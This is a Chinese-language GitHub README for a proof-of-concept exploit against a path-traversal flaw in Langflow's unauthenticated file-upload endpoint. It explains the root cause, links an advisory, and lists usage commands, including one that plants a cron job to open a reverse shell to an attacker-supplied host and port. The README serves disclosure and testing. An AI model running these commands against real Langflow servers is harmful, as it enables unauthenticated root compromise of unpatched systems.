yahiahamza/CVE-2026-5027

GitHub: yahiahamza/CVE-2026-5027

针对Langflow <= 1.8.4路径遍历漏洞的PoC利用工具,可通过未认证的文件上传接口实现任意文件写入并最终以root权限执行远程代码。

Stars: 0 | Forks: 1

# CVE-2026-5027 - Langflow 路径遍历导致远程代码执行 ## 描述 Langflow 1.8.4 及之前版本未对 `POST /api/v2/files` 端点中的 `filename` 参数进行过滤。攻击者可以利用路径遍历序列 (`../`) 将文件写入文件系统上的任意位置。结合 Langflow 默认的自动登录配置,此漏洞无需任何身份验证即可被利用,从而通过 cron 任务注入以 root 权限实现远程代码执行。 ## 受影响版本 - **受影响:** Langflow <= 1.8.4 - **已修复:** 撰写本文时暂无可用补丁 - **默认配置:** 启用自动登录(未认证利用) - **安全公告:** [Tenable TRA-2026-26](https://www.tenable.com/security/research/tra-2026-26) ## 使用方法 ``` # 概念验证(将测试文件写入 /tmp/) python3 exploit.py -t http://target:7860 # 使用凭据(如果禁用了自动登录) python3 exploit.py -t http://target:7860 -u admin -p password # 通过 cron job 反向 shell python3 exploit.py -t http://target:7860 --lhost YOUR_IP --lport 4444 ``` ## 示例输出 ![CVE-2026-5027 漏洞利用](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/83b3be7d06182117.png) ![CVE-2026-5027 反向 Shell](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/537dd8e8d0182119.png) ## 根本原因 `src/backend/base/langflow/api/v2/files.py` 中的 `upload_user_file()` 函数直接将 `file.filename` 传递给存储服务而未进行过滤。`LocalStorageService.save_file()` 使用 `folder_path / file_name` 构建路径,这无法阻止目录遍历。 ## 参考 - [Tenable 公告 TRA-2026-26](https://www.tenable.com/security/research/tra-2026-26) - [Langflow GitHub](https://github.com/langflow-ai/langflow) - [CVE-2026-5027:Langflow 路径遍历导致 RCE - 完整技术分析](https://yh.do/cve-2026-5027-langflow-path-traversal-rce/) ## 免责声明 本工具仅供授权安全测试和教育目的使用。请仅在您拥有或已获得明确测试权限的系统上使用。 ## 作者 Yahia Hamza - [https://yh.do](https://yh.do)
标签:CISA项目, Cron任务注入, CVE-2026-5027, Langflow, PoC, Python, RCE, 协议分析, 提权, 文件上传漏洞, 无后门, 暴力破解, 未授权访问, 权限提升, 漏洞分析, 编程工具, 网络安全, 路径探测, 路径遍历, 远程代码执行, 逆向工具, 隐私保护